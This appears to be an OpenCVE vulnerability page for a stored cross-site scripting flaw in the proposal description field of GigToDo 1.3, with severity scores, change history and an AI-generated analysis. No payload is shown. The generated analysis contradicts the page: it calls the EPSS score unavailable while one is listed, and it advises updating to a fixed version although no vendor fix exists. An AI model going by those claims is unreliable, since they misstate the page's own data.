Description
GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects.
Published: 2026-06-04
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

GigToDo version 1.3 contains a persistent cross‑site scripting flaw that lets authenticated users inject JavaScript and HTML into the proposal description field. When the content is later displayed by administrators or any user, the payload runs in the victim’s browser, allowing for cookie theft and malicious redirects.

Affected Systems

The vulnerability affects the GigToDo Freelance Marketplace Script, specifically version 1.3. No other versions are listed as impacted.

Risk and Exploitability

The vulnerability is rated with a CVSS score of 5.1, indicating a medium severity. The exploit requires the attacker to be authenticated and have permission to create proposals, and it relies on the application’s failure to escape stored HTML. No EPSS score is available, and the issue is not currently listed in CISA’s KEV catalog, suggesting that widespread exploitation is not confirmed. Nevertheless, because the flaw allows code execution in the browser context of privileged users, the risk remains moderate with potential confidentiality and integrity impacts on user sessions.

Generated by OpenCVE AI on June 4, 2026 at 14:36 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update GigToDo to the latest released version that addresses the XSS flaw.
  • Restrict the proposal creation privilege to trusted, non‑administrative accounts or temporarily disable the feature until a patch is applied.
  • Apply application‑level input sanitization and output escaping for the proposal description field, ensuring that all stored content is rendered safely.

Generated by OpenCVE AI on June 4, 2026 at 14:36 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 01:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

 cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Fri, 05 Jun 2026 10:45:00 +0000

Type Values Removed Values Added
First Time appeared Gigtodoscript
Gigtodoscript gigtodo
Vendors & Products Gigtodoscript
Gigtodoscript gigtodo

Thu, 04 Jun 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 04 Jun 2026 13:30:00 +0000

Type Values Removed Values Added
Description GigToDo 1.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript and HTML code through the proposal description field. Attackers can craft XSS payloads in the create_proposal endpoint that execute when administrators or other users view the stored proposal, enabling cookie theft and malicious redirects.
Title GigToDo Freelance Marketplace Script 1.3 Persistent XSS
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}

Subscriptions

Gigtodoscript Gigtodo
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-10T01:23:50.015Z

Reserved: 2026-06-04T11:07:17.017Z

Link: CVE-2019-25739

cve-icon Vulnrichment

Updated: 2026-06-04T14:32:47.450Z

cve-icon NVD

Status : Deferred

Published: 2026-06-04T14:16:32.373

Modified: 2026-06-10T02:16:31.907

Link: CVE-2019-25739

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-05T10:07:48Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')